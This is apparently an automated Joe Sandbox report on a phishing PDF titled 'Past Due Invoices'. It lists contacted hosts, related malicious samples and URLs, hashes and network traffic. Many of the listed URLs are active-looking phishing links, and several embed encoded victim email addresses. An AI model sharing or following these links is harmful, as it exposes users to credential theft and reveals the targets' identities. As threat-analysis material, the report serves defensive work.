https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/g7	AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.aiim.org/pdfa/ns/field#	AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmp	false		high
https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/	AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://clients2.googleusercontent.com	e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.dr	false		high
http://www.quicktime.com.Acrobat	AcroRd32.exe, 00000001.00000000.538137621.000000000B367000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ims-na1.adobelogin.com	AcroRd32.exe, 00000001.00000000.487309761.0000000008E26000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.google.com/	manifest.json1.26.dr	false		high
https://clients2.google.com/service/update2/crx	manifest.json.26.dr, manifest.json1.26.dr	false		high
https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/883m	AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.107.219.60	part-0032.t-0009.fbs1-t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.18.10.207	stackpath.bootstrapcdn.com	United States	13335	CLOUDFLARENETUS	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
142.250.186.77	accounts.google.com	United States	15169	GOOGLEUS	false
104.17.24.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
149.154.164.13	edit.telegra.ph	United Kingdom	62041	TELEGRAMRU	false
142.250.185.238	clients.l.google.com	United States	15169	GOOGLEUS	false
13.107.42.14	lnkd.in	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
192.229.221.185	cs1227.wpc.alphacdn.net	United States	15133	EDGECASTUS	false
103.53.43.226	karmarejoice.com	India	394695	PUBLIC-DOMAIN-REGISTRYUS	false
50.87.150.0	dancevida.com	United States	46606	UNIFIEDLAYER-AS-1US	false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	626309
Start date and time: 13/05/202220:43:56	2022-05-13 20:43:56 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Past Due Invoices.pdf
Cookbook file name:	defaultwindowspdfcookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.phis.winPDF@46/169@16/14
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .pdf Adjust boot time Enable AMSI Found PDF document Find and activate links Security Warning found Close Viewer Browse: https://lnkd.in/d-ad9VpM

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 80.67.82.80, 80.67.82.97, 23.211.4.250, 142.250.184.206, 172.217.132.136, 74.125.100.201, 142.250.185.99, 142.250.186.106, 188.114.96.10, 188.114.97.10, 69.16.175.10, 69.16.175.42, 142.250.184.234, 142.250.186.163, 142.250.203.99
Excluded domains from analysis (whitelisted): logincdn.msauth.net, cds.s5x3j6q5.hwcdn.net, e4578.dscb.akamaiedge.net, clientservices.googleapis.com, r1---sn-5hne6nz6.gvt1.com, use.fontawesome.com.cdn.cloudflare.net, arc.msn.com, r4---sn-5hne6nzs.gvt1.com, acroipm2.adobe.com, r3---sn-5hne6nzk.gvt1.com, redirector.gvt1.com, r3.sn-5hne6nzk.gvt1.com, login.live.com, a122.dscd.akamai.net, sls.update.microsoft.com, update.googleapis.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, r4.sn-5hne6nz6.gvt1.com, www.gstatic.com, global-entry-afdthirdparty-fallback.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, content-autofill.googleapis.com, acroipm2.adobe.com.edgesuite.net, aadcdnoriginwus2.azureedge.net, ajax.googleapis.com, lgincdnvzeuno.ec.azureedge.net, r4---sn-5hne6nzk.gvt1.com, aadcdn.msauth.net, r3---sn-5hne6nzd.gvt1.com, r4---sn-5hne6nz6.gvt1.com, firstparty-azurefd-prod.trafficmanager.net, lgincdnvzeuno.azureedge.net, ris.api.iris.microsoft.com, ssl.adobe.com.edg
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:45:07	API Interceptor	15x Sleep call for process: RdrCEF.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
13.107.219.60	#Ud83d#Udcde_0072520589037.html (2).html	Get hash	malicious	Browse
	Invreceipt7291XZ4-BWGI7X-RHL3xfh339.htm	Get hash	malicious	Browse
	INV#00519.xlsx	Get hash	malicious	Browse
	Kogbonds-Calling-Mail.html	Get hash	malicious	Browse
	https://dussetiere-my.sharepoint.com/:b:/g/personal/i_montembault_dussetiere_fr/EabJLR5faDlMiosfmmsmiNsBt4adMF4wiMBpWPTQgfgK1w	Get hash	malicious	Browse
	Clear Cache- Arvind.kumar.html	Get hash	malicious	Browse
	ATT30392.htm	Get hash	malicious	Browse
	WAXF131.exe	Get hash	malicious	Browse
	DotRemittance1956.htm	Get hash	malicious	Browse
	htmlviewer.html	Get hash	malicious	Browse
	https://onedrive.live.com/view.aspx?resid=9723505363A848DD!117&authkey=!AEd8Ta1o7NI7TNI	Get hash	malicious	Browse
	https://k-fm9.online/main/	Get hash	malicious	Browse
	ST10-Agreement Release-gwacker@kcmba.org_Fax.htm	Get hash	malicious	Browse
	Phishing Campaign Results - YTKMCW.xlsm	Get hash	malicious	Browse
	Invoice&PO_Thursday, May, 05, 2022.HTML	Get hash	malicious	Browse
	Attachment_PR6194 39619 619.html	Get hash	malicious	Browse
	b2057249.exe	Get hash	malicious	Browse
	payslip.html	Get hash	malicious	Browse
	198_Invoice_#15427.html	Get hash	malicious	Browse
	#U260e#Ufe0f Audio570011.htm	Get hash	malicious	Browse
104.18.10.207	https://www.myaero.net/aaa/click/100000003330?redirectUrl=https://ypredir.com?e=amFuZXQuZG9oZXJ0eUB2ZXJpdGFzLmNvbQ==&data=05	Get hash	malicious	Browse
	https://znap.link/andrea.selmo-michell.comandrea.selmo-michell.comandrea.selmo-michell.comandrea.selmo-michell.com	Get hash	malicious	Browse
	https://w2globaldata.cabildodeagayu.com/1/?e=bGVzLmZyZWVsYW5kQHcyZ2xvYmFsZGF0YS5jb20=	Get hash	malicious	Browse
	https://w2globaldata.cabildodeagayu.com/1/?e=bGVzLmZyZWVsYW5kQHcyZ2xvYmFsZGF0YS5jb20=	Get hash	malicious	Browse
	https://gusty-legal-49c.notion.site/ALEXANDRINE-Murielle-vous-a-donn-acc-s-un-document-s-curis-e6cb364f5c694f18886d3c64a9da56b2	Get hash	malicious	Browse
	https://rp.mockplus.com/run/w3scV0nBNq/-GGeKIBoQs?cps=expand&rps=collapse&nav=1&ha=0&la=0&fc=0&out=1&rt=1	Get hash	malicious	Browse
	Inv-#3D0958275.xlsx	Get hash	malicious	Browse
	StatementCopy#Globalfoundries899824Globalfoundries514-#Ud83d#Udcde49087.HTM	Get hash	malicious	Browse
	Invoice_Copic-Copic.com628491.html	Get hash	malicious	Browse
	StatementCopy#Globalfoundries899824Globalfoundries514-#Ud83d#Udcde49087.HTM	Get hash	malicious	Browse
	https://www.myaero.net/aaa/click/100000003330?redirectUrl=https://ypredir.com?e=amFuZXQuZG9oZXJ0eUB2ZXJpdGFzLmNvbQ==&data=05	Get hash	malicious	Browse
	https://adobeint-mid-prod13-t.adobe-campaign.com/r/?id=hfdeb442c,cb2fe693,bd1eee83	Get hash	malicious	Browse
	http://jbhess.jbhess.africartz.com/amJoZXNzQGhlc3MuY29t	Get hash	malicious	Browse
	http://jbhess.jbhess.africartz.com/amJoZXNzQGhlc3MuY29t	Get hash	malicious	Browse
	https://invierteenmiproyecto.com/rey/index.php	Get hash	malicious	Browse
	Invoice_Doubleline-Doubleline.com171883.html	Get hash	malicious	Browse
	https://nahan.rposervices.com/ua/?e=YXJAbmFoYW4uY29t	Get hash	malicious	Browse
	https://rb.gy/ne8hsc	Get hash	malicious	Browse
	INV#00519.xlsx	Get hash	malicious	Browse
	INV#00519.xlsx	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
stackpath.bootstrapcdn.com	https://www.myaero.net/aaa/click/100000003330?redirectUrl=https://ypredir.com?e=amFuZXQuZG9oZXJ0eUB2ZXJpdGFzLmNvbQ==&data=05	Get hash	malicious	Browse	104.18.10.207
	https://telegra.ph/Invoice-05-13	Get hash	malicious	Browse	104.18.11.207
	https://w2globaldata.cabildodeagayu.com/1/?e=d2FycmVuLnJ1c3NlbGxAdzJnbG9iYWxkYXRhLmNvbQ==	Get hash	malicious	Browse	104.18.11.207
	https://znap.link/andrea.selmo-michell.comandrea.selmo-michell.comandrea.selmo-michell.comandrea.selmo-michell.com	Get hash	malicious	Browse	104.18.11.207
	Payment Remittance098.html	Get hash	malicious	Browse	104.18.11.207
	https://w2globaldata.cabildodeagayu.com/1/?e=bGVzLmZyZWVsYW5kQHcyZ2xvYmFsZGF0YS5jb20=	Get hash	malicious	Browse	104.18.11.207
	https://w2globaldata.cabildodeagayu.com/1/?e=bGVzLmZyZWVsYW5kQHcyZ2xvYmFsZGF0YS5jb20=	Get hash	malicious	Browse	104.18.10.207
	https://securepubads.g.doubleclick.net/pcs/view?adurl=https%3a%2f%2fquzqvm.codesandbox.io?dg=cHJ6ZW15c2xhdy5rcmF3Y3p5a293c2tpQG1hZXJza2RyaWxsaW5nLmNvbQ==	Get hash	malicious	Browse	104.18.11.207
	StatementCopy#Globalfoundries899824Globalfoundries514-#Ud83d#Udcde49087.HTM	Get hash	malicious	Browse	104.18.10.207
	StatementCopy#Globalfoundries899824Globalfoundries514-#Ud83d#Udcde49087.HTM	Get hash	malicious	Browse	104.18.10.207
	https://www.myaero.net/aaa/click/100000003330?redirectUrl=https://ypredir.com?e=amFuZXQuZG9oZXJ0eUB2ZXJpdGFzLmNvbQ==&data=05	Get hash	malicious	Browse	104.18.10.207
	http://jbhess.jbhess.africartz.com/amJoZXNzQGhlc3MuY29t	Get hash	malicious	Browse	104.18.10.207
	http://jbhess.jbhess.africartz.com/amJoZXNzQGhlc3MuY29t	Get hash	malicious	Browse	104.18.10.207
	https://1drv.ms:443/o/s!BPANqgMdvDCfgY4gLRVTcS1Y8Qdhww?e=McBHuNv2Z0qnvRoQEkiGkQ&at=9	Get hash	malicious	Browse	104.18.11.207
	https://nahan.rposervices.com/ua/?e=YXJAbmFoYW4uY29t	Get hash	malicious	Browse	104.18.10.207
	INV#00519.xlsx	Get hash	malicious	Browse	104.18.10.207
	INV#00519.xlsx	Get hash	malicious	Browse	104.18.11.207
	https://securepubads.g.doubleclick.net/pcs/view?adurl=https%3a%2f%2fquzqvm.codesandbox.io?dg=ZnJhbmNvaXMuam9sbGVzQGl1Y24ub3Jn	Get hash	malicious	Browse	104.18.10.207
	http://walbrookasset.andreidesign.com.br/ere/?e=bmVpbC5zYXdicmlkZ2VAd2FsYnJvb2thc3NldC5jb20=	Get hash	malicious	Browse	104.18.11.207
	http://walbrookasset.andreidesign.com.br/ere/?e=bmVpbC5zYXdicmlkZ2VAd2FsYnJvb2thc3NldC5jb20=	Get hash	malicious	Browse	104.18.11.207
dancevida.com	https://www.meg-claimpymnt.net	Get hash	malicious	Browse	50.87.150.0
	12152021-lenglish@shb.com_1105 AM65Application.HTM	Get hash	malicious	Browse	50.87.150.0
	1182021-thomas.ee@globalfoundries.com_531 AM65Application.HTM	Get hash	malicious	Browse	50.87.150.0
	1182021-becky.sias@trustvesta.com_531 AM65Application.HTM	Get hash	malicious	Browse	50.87.150.0
	10272021-AM65Application.HTM	Get hash	malicious	Browse	50.87.150.0
	10252021-sforney@covh.org_809 AM65Application.HTM	Get hash	malicious	Browse	50.87.150.0
	michael.iuliucci_33990Application.HTML	Get hash	malicious	Browse	50.87.150.0
	wyg.com Leave Policy Thursday, April 15th, 2021.htm	Get hash	malicious	Browse	50.87.150.0
	Friday, April 2nd, 2021, 20210402062906.8CE1B73ADE2A192C@compassionarmy.com.htm	Get hash	malicious	Browse	50.87.150.0
	Thursday, February 11th, 2021, 20210211033346.3BD4A181171AEBE1@gotasdeamor.cl.htm	Get hash	malicious	Browse	50.87.150.0
	Tuesday, February 9th, 2021 8%3A1%3A54 a.m., _20210209080154.8E45EAA12FF8DC21@sophiajoyas.cl_.html	Get hash	malicious	Browse	50.87.150.0
	Tuesday, February 9th, 2021 83422 a.m., 20210209083422.7B8380338EC1D61B@sophiajoyas.cl.html	Get hash	malicious	Browse	50.87.150.0
	Friday_ February 5th_ 2021 64427 a.m._ 20210205064427.64791275BD060468@juidine.com.html	Get hash	malicious	Browse	50.87.150.0
	Thursday, February 4th, 2021 103440 p.m., 20210204223440.464D4D4AD1BFDE50@juidine.com.html	Get hash	malicious	Browse	50.87.150.0
	1_25_2021 11_20_30 a.m., [Payment 457 CMSupportDev].html	Get hash	malicious	Browse	50.87.150.0
	Payment_[Ref 72630 - joe.blow].html	Get hash	malicious	Browse	50.87.150.0
	http://landerer.wellwayssaustralia.com/r/?id=kl522318,Z185223,I521823&rd=www.electriccollisionrepair.com/236:52%20PMt75252n2021?e=#landerer@doriltoncapital.com	Get hash	malicious	Browse	50.87.150.0
	http://charles.yee.electriccollisionrepair.com/r/?id=kl35136,Z63513,I35613&rd=www.tranz-life.com/b6:35%20AMt293535n2020?e=#charles.yee@livibank.com	Get hash	malicious	Browse	50.87.150.0
	http://080810matthew.allen08.earlroseconsulting.com/r/?id=hbd659767,2C28c67268,2C28c67269&rd=orka.mk/08x360808x3608?e=#matthew.allen@perpetual.com.au	Get hash	malicious	Browse	50.87.150.0
	http://505010charles.yee50.earlroseconsulting.com/r/?id=hbd659767,2C28c67268,2C28c67269&rd=orka.mk/50x485050x4850?e=#charles.yee@livibank.com	Get hash	malicious	Browse	50.87.150.0

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	ZG9zarm7	Get hash	malicious	Browse	104.27.20.72
	gayporn.exe	Get hash	malicious	Browse	188.114.96.10
	SecuriteInfo.com.Variant.Jaik.72878.11724.exe	Get hash	malicious	Browse	172.67.133.127
	MzQPP2vSaD	Get hash	malicious	Browse	172.68.212.93
	ungewx6mWH	Get hash	malicious	Browse	172.68.102.151
	https://jogseee.fibery.io/Getting_Started/jog-AB-4?sharing-key=ab648c94-ad5b-4ad9-8778-8fa59354251a	Get hash	malicious	Browse	172.66.41.40
	https://www.myaero.net/aaa/click/100000003330?redirectUrl=https://ypredir.com?e=amFuZXQuZG9oZXJ0eUB2ZXJpdGFzLmNvbQ==&data=05	Get hash	malicious	Browse	104.18.10.207
	Tsunami.x86	Get hash	malicious	Browse	172.69.163.242
	Tsunami.arm7	Get hash	malicious	Browse	172.68.212.90
	Tsunami.arm	Get hash	malicious	Browse	172.65.108.244
	http://15u30P6pz0M18W5vt.cam	Get hash	malicious	Browse	172.67.181.201
	7dZnLiwzlM	Get hash	malicious	Browse	172.70.21.9
	https://telegra.ph/Invoice-05-13	Get hash	malicious	Browse	104.18.11.207
	https://form.jotform.com/221323445206041	Get hash	malicious	Browse	104.26.6.134
	Syhwdgsr.exe	Get hash	malicious	Browse	162.159.134.233
	https://form.jotform.com/221323445206041	Get hash	malicious	Browse	104.26.6.134
	scan-copy.xlsx	Get hash	malicious	Browse	172.67.133.127
	GujVgIhAhF	Get hash	malicious	Browse	172.68.102.160
	#Ud83d#Udcde_0072520589037.html (2).html	Get hash	malicious	Browse	104.17.25.14
	jMwLd1tqLe	Get hash	malicious	Browse	172.71.235.5
MICROSOFT-CORP-MSN-AS-BLOCKUS	ZG9zarm7	Get hash	malicious	Browse	191.235.128.40
	ZG9zarm	Get hash	malicious	Browse	191.233.184.218
	https://fedgovapp.com/Maryland-login/	Get hash	malicious	Browse	52.227.223.80
	https://www.myaero.net/aaa/click/100000003330?redirectUrl=https://ypredir.com?e=amFuZXQuZG9oZXJ0eUB2ZXJpdGFzLmNvbQ==&data=05	Get hash	malicious	Browse	20.203.235.163
	dEQ1kYJPQH	Get hash	malicious	Browse	20.79.93.120
	sora.x86	Get hash	malicious	Browse	40.119.233.151
	TcFfMlrhUF	Get hash	malicious	Browse	23.99.68.13
	FedEx.exe	Get hash	malicious	Browse	13.107.43.13
	7dZnLiwzlM	Get hash	malicious	Browse	20.136.32.72
	uQJgh6ax7k	Get hash	malicious	Browse	13.93.237.66
	b4Y1JlJEtI	Get hash	malicious	Browse	20.106.255.139
	https://form.jotform.com/221323445206041	Get hash	malicious	Browse	204.79.197.200
	vGS5FlwPDP	Get hash	malicious	Browse	20.156.125.52
	https://form.jotform.com/221323445206041	Get hash	malicious	Browse	204.79.197.200
	Markham_remittance71792.html	Get hash	malicious	Browse	13.107.246.60
	#Ud83d#Udcde_0072520589037.html (2).html	Get hash	malicious	Browse	13.107.219.60
	oSFq28oxoZ	Get hash	malicious	Browse	20.246.189.44
	jMwLd1tqLe	Get hash	malicious	Browse	20.176.186.173
	lo8X4VmYlO	Get hash	malicious	Browse	20.21.225.245
	bsalazarSecuremail#Redriverbank2602VY8-FOAT7J-SNN6eYn999.html	Get hash	malicious	Browse	13.107.246.60

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	http://15u30P6pz0M18W5vt.cam	Get hash	malicious	Browse	13.107.219.60 192.229.221.185 149.154.164.13 103.53.43.226
	PaymentDetails170.htm	Get hash	malicious	Browse	13.107.219.60 192.229.221.185 149.154.164.13 103.53.43.226
	FedEx.exe	Get hash	malicious	Browse	13.107.219.60 192.229.221.185 149.154.164.13 103.53.43.226
	https://telegra.ph/Invoice-05-13	Get hash	malicious	Browse	13.107.219.60 192.229.221.185 149.154.164.13 103.53.43.226
	Markham_remittance71792.html	Get hash	malicious	Browse	13.107.219.60 192.229.221.185 149.154.164.13 103.53.43.226
	#Ud83d#Udcde_0072520589037.html (2).html	Get hash	malicious	Browse	13.107.219.60 192.229.221.185 149.154.164.13 103.53.43.226
	bsalazarSecuremail#Redriverbank2602VY8-FOAT7J-SNN6eYn999.html	Get hash	malicious	Browse	13.107.219.60 192.229.221.185 149.154.164.13 103.53.43.226
	http://www.robertwarner.co.uk/lim/consequences-of-not-meeting-deadlines	Get hash	malicious	Browse	13.107.219.60 192.229.221.185 149.154.164.13 103.53.43.226
	https://drive.google.com/uc?export=download&id=1mmXl38H2-j7e7hD_UJbEMMSnMTA0BtQV	Get hash	malicious	Browse	13.107.219.60 192.229.221.185 149.154.164.13 103.53.43.226
	Payment Remittance098.html	Get hash	malicious	Browse	13.107.219.60 192.229.221.185 149.154.164.13 103.53.43.226
	https://sharingonlinepdf.simplesite.com/	Get hash	malicious	Browse	13.107.219.60 192.229.221.185 149.154.164.13 103.53.43.226
	https://surveyatos.com	Get hash	malicious	Browse	13.107.219.60 192.229.221.185 149.154.164.13 103.53.43.226
	INV_660100.xlsx	Get hash	malicious	Browse	13.107.219.60 192.229.221.185 149.154.164.13 103.53.43.226
	http://auth0012outlook.atwebpages.com/office365/index.html	Get hash	malicious	Browse	13.107.219.60 192.229.221.185 149.154.164.13 103.53.43.226
	Scan_20221205_361305.xls	Get hash	malicious	Browse	13.107.219.60 192.229.221.185 149.154.164.13 103.53.43.226
	Fattura N 0000985-19 YBZ 12-05-2022.xls	Get hash	malicious	Browse	13.107.219.60 192.229.221.185 149.154.164.13 103.53.43.226
	2022IM00001489.xls	Get hash	malicious	Browse	13.107.219.60 192.229.221.185 149.154.164.13 103.53.43.226
	Changellc 7725 .htm	Get hash	malicious	Browse	13.107.219.60 192.229.221.185 149.154.164.13 103.53.43.226
	https://sync.crwdcntrl.net/map/c=9828/tp=ADBE/gdpr=0/gdpr_consent=/tpid=62553350917825036762023184708005776201?https%3A%2F%2Fsign-smpu724eb7r29qzs1gw162nd2cilb0gppxkyfq3q1rk.website%E2%80%8B.yandexcloud.net%23dbrodie@standrew.co.uk	Get hash	malicious	Browse	13.107.219.60 192.229.221.185 149.154.164.13 103.53.43.226
	Formular 2022.12.05_1202.xls	Get hash	malicious	Browse	13.107.219.60 192.229.221.185 149.154.164.13 103.53.43.226

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	451603
Entropy (8bit):	5.009711072558331
Encrypted:	false
SSDEEP:	12288:ZHfRTyGZ6lup8Cfrvq4JBPKh+FBlESBw4p6:NfOCzvRKhGvwJ
MD5:	A78AD14E77147E7DE3647E61964C0335
SHA1:	CECC3DD41F4CEA0192B24300C71E1911BD4FCE45
SHA-256:	0D6803758FF8F87081FAFD62E90F0950DFB2DD7991E9607FE76A8F92D0E893FA
SHA-512:	DDE24D5AD50D68FC91E9E325D31E66EF8F624B6BB3A07D14FFED1104D3AB5F4EF1D7969A5CDE0DFBB19CB31C506F7DE97AF67C2F244F7E7E8E10648EA8321101
Malicious:	false
Preview:	BDic.... ....6...."..Z..4g....6.2...{/...3...5....AF 1363.AF nm.AF pt.AF n1.AF p.AF tc.AF SM.AF M.AF S.AF MS.AF MNR.AF GDS.AF MNT.AF MH.AF MR.AF SZMR.AF MJ.AF MT.AF MY.AF MRZ.AF MN.AF MG.AF RM.AF N.AF MV.AF XM.AF DSM.AF SD.AF G.AF R.AF MNX.AF MRS.AF MD.AF MNRB.AF B.AF ZSMR.AF PM.AF SMNGJ.AF SMN.AF ZMR.AF SMGB.AF MZR.AF GM.AF SMR.AF SMDG.AF RMZ.AF ZM.AF MDG.AF MDT.AF SMNXT.AF SDY.AF LSDG.AF LGDS.AF GLDS.AF UY.AF U.AF DSGNX.AF GNDSX.AF DSG.AF Y.AF GS.AF IEMS.AF YP.AF ZGDRS.AF XGNVDS.AF UT.AF GNDS.AF GVDS.AF MYPS.AF XGNDS.AF TPRY.AF MDSG.AF ZGSDR.AF DYSG.AF PMYTNS.AF AGDS.AF DRZGS.AF PY.AF GSPMDY.AF EGVDS.AF SL.AF GNXDS.AF DSBG.AF IM.AF I.AF MDGS.AF SMY.AF DSGN.AF DSLG.AF GMDS.AF MDSBG.AF SGD.AF IY.AF P.AF DSMG.AF BLZGDRS.AF TR.AF AGSD.AF ZGBDRSL.AF PTRY.AF ASDGV.AF ASM.AF ICANGSD.AF ICAM.AF IKY.AF AMS.AF PMYTRS.AF BZGVDRS.AF SDRBZG.AF GVMDS.AF PSM.AF DGLS.AF GNVXDS.AF AGDSL.AF DGS.AF XDSGNV.AF BZGDRS.AF AM.AF AS.AF A.AF LDSG.AF AGVDS.AF SDG.AF LDSMG.AF EDSMG.AF EY.AF DRSMZG.AF PRYT.AF LZ

Source: https://karmarejoice.com/lopi/office-RD117/	HTTP Parser: HTML title missing
Source: https://karmarejoice.com/lopi/office-RD117/	HTTP Parser: HTML title missing

Source: https://karmarejoice.com/lopi/office-RD117/	HTTP Parser: Number of links: 0
Source: https://karmarejoice.com/lopi/office-RD117/	HTTP Parser: Number of links: 0

Source: https://karmarejoice.com/lopi/office-RD117/	HTTP Parser: No <meta name="author".. found
Source: https://karmarejoice.com/lopi/office-RD117/	HTTP Parser: No <meta name="author".. found

Source: https://karmarejoice.com/lopi/office-RD117/	HTTP Parser: No <meta name="copyright".. found
Source: https://karmarejoice.com/lopi/office-RD117/	HTTP Parser: No <meta name="copyright".. found

Source: Joe Sandbox View	IP Address: 13.107.219.60 13.107.219.60
Source: Joe Sandbox View	IP Address: 104.18.10.207 104.18.10.207

Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900
